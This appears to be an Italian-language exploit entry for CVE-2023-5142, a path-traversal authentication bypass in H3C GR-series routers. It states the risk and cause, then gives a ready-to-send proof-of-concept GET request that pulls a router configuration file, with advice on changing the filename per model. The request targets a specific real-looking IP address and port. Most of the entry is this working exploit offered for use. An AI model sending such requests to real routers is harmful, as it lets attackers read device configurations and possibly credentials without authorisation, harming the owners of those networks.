
CVE-2023-5142
Prodotto: Router serie GR
versione: tutte
valutazione: alto rischio
sito web: http://www.h3c.com/
Rischi: Gli aggressori possono sfruttare questa vulnerabilità per ottenere informazioni sensibili dai router costruendo pacchetti di richiesta speciali per bypassare la verifica dell'identità.
principio: Il router non autentica l'accesso alle directory e ai file correlati
exp:
Nota: È necessario modificare il suffisso del nome file nel POC, ad esempio GR8300.cfg
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
image
image
image